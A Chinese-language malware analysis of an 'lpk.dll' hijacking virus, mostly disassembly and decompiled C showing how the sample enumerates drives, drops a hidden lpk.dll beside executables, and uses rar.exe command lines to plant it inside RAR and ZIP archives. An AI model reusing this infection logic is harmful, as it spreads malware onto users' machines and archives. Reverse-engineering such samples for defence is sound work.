lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上写了个Lpk、并对lpk做了点研究、所以想必今天晚上看起来这些应该会方便很多、至于关于
lpk的文章请去我Blog参考笔记、这里就不废话了
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接载入Lpk11.dll
.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpReserved)
.text:10001A32 public DllEntryPoint
.text:10001A32 DllEntryPoint proc near
.text:10001A32
.text:10001A32 hLibModule = dword ptr 4
.text:10001A32 fdwReason = dword ptr 8
.text:10001A32 lpReserved = dword ptr 0Ch
.text:10001A32
.text:10001A32 cmp [esp+fdwReason], 1
.text:10001A37 push esi
.text:10001A38 jnz short loc_10001AA9
.text:10001A3A mov esi, [esp+4+hLibModule]
.text:10001A3E push 104h ; nSize
.text:10001A43 push offset ExistingFileName ; lpFilename
.text:10001A48 push esi ; hModule
.text:10001A49 mov dword_10003290, esi
.text:10001A4F call ds:GetModuleFileNameW
.text:10001A55 push esi ; hLibModule
.text:10001A56 call ds:DisableThreadLibraryCalls
.text:10001A5C call GetMutexName
.text:10001A61 cmp eax, 1
.text:10001A64 jnz short loc_10001AA2
.text:10001A66 call IsVirusKernelFile ;用来判断是否由病毒核
心进程释放
.text:10001A6B test eax, eax
.text:10001A6D jnz short loc_10001A7D
.text:10001A6F call CreateMutex
.text:10001A74 test eax, eax
.text:10001A76 jnz short loc_10001A7D
.text:10001A78 call ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D ; DllEntryPoint+44j
.text:10001A7D call IsCurrentFileLpk
.text:10001A82 cmp eax, 1
.text:10001A85 jnz short loc_10001AA2
.text:10001A87 push 0 ; lpName
.text:10001A89 push 0 ; bInitialState
.text:10001A8B push eax ; bManualReset
.text:10001A8C push 0 ; lpEventAttributes
.text:10001A8E call ds:CreateEventW
.text:10001A94 mov hHandle, eax
.text:10001A99 test eax, eax
.text:10001A9B jz short loc_10001AA2
.text:10001A9D call StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32j
.text:10001AA2 ; DllEntryPoint+53j ...
.text:10001AA2 call InitLpk
.text:10001AA7 jmp short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------
009119E6 <lpk11.StartThread> /$ 56 push esi
009119E7 |. 33F6 xor esi, esi
009119E9 |. 56 push esi ;
/pThreadId => NULL
009119EA |. 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
009119EC |. 56 push esi ; |
pThreadParm => NULL
009119ED |. 68 D3189100 push <FuckAllDisk> ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2 |. 56 push esi ; |
StackSize => 0
009119F3 |. 56 push esi ; |
pSecurity => NULL
009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
009118D3 <lpk11.FuckAllDisk> . 81EC C4000000 sub esp, 0C4
009118D9 . 53 push ebx
009118DA . 55 push ebp
009118DB . 56 push esi
009118DC . 57 push edi
009118DD . 6A 60 push 60 ;
/Length = 60 (96.)
009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
009118E3 . 50 push eax ; |
Destination
009118E4 . 33FF xor edi, edi ; |
009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMem>;
\RtlZeroMemory
009118EC > 6A 02 push 2
009118EE . 5B pop ebx
009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74]
009118F3 . C74424 10 180>mov dword ptr [esp+10], 18
009118FB > 837D 00 01 cmp dword ptr [ebp], 1
009118FF . 74 5B je short 0091195C
00911901 . 53 push ebx
00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ;
shell32.DriveType
00911908 . 83C0 FE add eax, -2
0091190B . 83F8 02 cmp eax, 2 ; 类
型否为可感染类型?
0091190E . 77 4C ja short 0091195C
00911910 . 33C0 xor eax, eax
00911912 . 50 push eax ;
/pThreadId => NULL
00911913 . 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
00911915 . 53 push ebx ; |
pThreadParm
00911916 . 68 77169100 push <Infect> ; |
ThreadFunction = <lpk11.Infect>
0091191B . 50 push eax ; |
StackSize => 0
0091191C . 50 push eax ; |
pSecurity => NULL
0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
signed int __stdcall Infect(LPCWSTR lpString1)
{
const WCHAR *v2; // [url=mailto:eax@17]eax@17[/url]
struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
WCHAR String2; // [sp+254h] [bp-418h]@4
WCHAR FileName; // [sp+45Ch] [bp-210h]@6
HANDLE hFindFile; // [sp+664h] [bp-8h]@6
int v7; // [sp+668h] [bp-4h]@1
const WCHAR *v8; // [sp+674h] [bp+8h]@17
v7 = 1;
if ( WaitForSingleObject(hHandle, 0) != 258 )
return 0;
if ( (unsigned int)lpString1 >= 0x100 )
{
lstrcpyW(&String2, lpString1);
}
else
{
lstrcpyW(&String2, L"A:\\");
String2 += (unsigned __int16)lpString1;
}
lstrcpyW(&FileName, &String2);
PathAppendW(&String2, &word_10002374);
hFindFile = FindFirstFileW(&String2, &FindFileData);
if ( hFindFile == (HANDLE)-1 )
return 1;
lstrcpyW(&String2, &FileName);
while ( 1 )
{
if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..")
)
goto LABEL_27;
if ( FindFileData.dwFileAttributes & 0x10 )
break;
v2 = PathFindExtensionW(FindFileData.cFileName);
v8 = v2;
if ( v2 )
{
if ( !lstrcmpiW(v2, L".EXE") ) // 目录下有exe就将lpk复制过去
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, L"lpk.dll");
if ( GetFileAttributesW(&FileName) != -1 )
goto LABEL_27;
CopyFileW(&ExistingFileName, &FileName, 1);
SetFileAttributesW(&FileName, 7u);
}
if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
{
if ( !FindFileData.nFileSizeHigh )
{
if ( FindFileData.nFileSizeLow < 0x3200000 )
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, FindFileData.cFileName);
InfectCompressFile(&FileName);
}
}
}
}
DWORD __cdecl InfectCompressFile(int a1)
{
DWORD result; // [url=mailto:eax@1]eax@1[/url]
wchar_t v2[2]; // [url=mailto:eax@3]eax@3[/url]
UINT v3; // [url=mailto:eax@6]eax@6[/url]
WCHAR CommandLine; // [sp+0h] [bp-824h]@6
WCHAR PathName; // [sp+410h] [bp-414h]@6
WCHAR FileName; // [sp+618h] [bp-20Ch]@1
const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3
int v8; // [sp+820h] [bp-4h]@1
v8 = 520;
result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0,
&FileName, &v8);
if ( !result )
{
if ( FileName == 34 )
{
lstrcpyW(&FileName, &String2);
*(_DWORD *)v2 = L"\"";
}
else
{
*(_DWORD *)v2 = L" ";
}
result = StrStrIW(&FileName, *(_DWORD *)v2);
if ( result )
{
*(_WORD *)result = 0;
PathRemoveFileSpecW(&FileName);
PathAppendW(&FileName, L"rar.exe");
result = GetFileAttributesW(&FileName);
if ( result != -1 )
{
PathGetShortPath(&FileName);
GetTempPathW(MAX_PATH, &PathName);
v3 = GetCurrentThreadId();
GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
&CommandLine,
L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
&FileName,
a1,
&PathName);
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
if ( result )
{
wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1,
&PathName);
UpdatePackage(&CommandLine, 0x1D4C0u);
Infect(&PathName);
wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName,
&PathName, a1, &PathName);
UpdatePackage(&CommandLine, 0x3A980u);
wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
}
}
}
}
return result;
}
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)